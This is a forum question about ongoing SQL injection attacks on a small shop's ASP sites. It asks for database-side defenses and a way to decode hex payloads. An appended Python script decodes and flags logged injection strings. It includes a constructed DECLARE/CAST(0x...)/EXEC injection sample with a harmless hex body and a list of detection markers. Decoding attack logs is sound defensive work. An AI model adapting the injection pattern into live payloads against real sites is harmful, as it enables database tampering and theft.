SQL Injection #2
Asked by paemond
Hi,
We're still being attacked via SQL Injection. I leave the database that's been targeted most of the time, in single user mode, during off hours. At least that way I don't wake up to find all my tables corrupted or worse, gone altogether.
We're bringing in a security expert to take a look at our sites. We know that the .asp pages have to be fixed and have a pretty good idea of how, but we're a very small shop and until then I'm going to have to deal with this on the database side. I'm doing backups of the database that's been hit the most every 30 minutes, and I've added some auditing columns and triggers on all the tables so I can see when it happens.
#1) Is there anything else I can do on the database side to protect myself?
#2) Is there anything around that I can use to translate the hex codes that are being used? For example:
Thanks
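As an added example (not part of the question or of the Experts Exchange answer), a small Python script that does what #2 asks: it URL-decodes a logged request fragment, flags the DECLARE / CAST(0x / EXEC(@ markers this family of injections uses, and translates the UTF-16LE hex blob back into readable SQL so it can be reviewed. The log fragment, the hex it contains and the marker list are constructed for the demo.

```python
import re
from urllib.parse import unquote

# Constructed sample of a query-string fragment as it would appear in an IIS/web
# log (NOT the payload from the question): the hex blob encodes the harmless
# statement "select name from sysobjects" as UTF-16LE, the way NVARCHAR CAST
# payloads do. The spaces inside the hex mimic how such blobs get wrapped.
SAMPLE_LOG_FRAGMENT = (
    "id=12%20;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x"
    "73006500 6C006500 63007400 20006E00 61006D00 65002000 66007200 "
    "6F006D00 20007300 79007300 6F006200 6A006500 63007400 7300"
    "%20AS%20NVARCHAR(4000));EXEC(@S);--"
)

# A hex literal after 0x, possibly split into whitespace-separated byte pairs.
HEX_BLOB = re.compile(r"0x((?:[0-9A-Fa-f]{2}\s*)+)")
# Markers typical of the hex-encoded injection pattern (compared case-insensitively).
INJECTION_MARKERS = ("DECLARE @", "CAST(0X", "EXEC(@")


def decode_hex_blob(hex_text: str) -> str:
    """Turn a 0x... blob into text. CAST(... AS NVARCHAR) payloads are UTF-16LE
    (every second byte is 0x00); VARCHAR variants are single-byte text."""
    raw = bytes.fromhex(re.sub(r"\s+", "", hex_text))
    if len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("latin-1")


def translate_request(fragment: str) -> dict:
    """URL-decode a request fragment, report whether it carries the markers of
    a hex-encoded injection, and decode every 0x blob it contains."""
    decoded = unquote(fragment)
    upper = decoded.upper()
    return {
        "suspicious": any(m in upper for m in INJECTION_MARKERS),
        "statement": decoded,
        "blobs": [decode_hex_blob(h) for h in HEX_BLOB.findall(decoded)],
    }


if __name__ == "__main__":
    result = translate_request(SAMPLE_LOG_FRAGMENT)
    print("suspicious:", result["suspicious"])
    for sql in result["blobs"]:
        print("decoded:", sql)
```

Run it over the request fields of your web-server log and review whatever comes back decoded; the decoded text is exactly the statement the injected EXEC would hand to SQL Server.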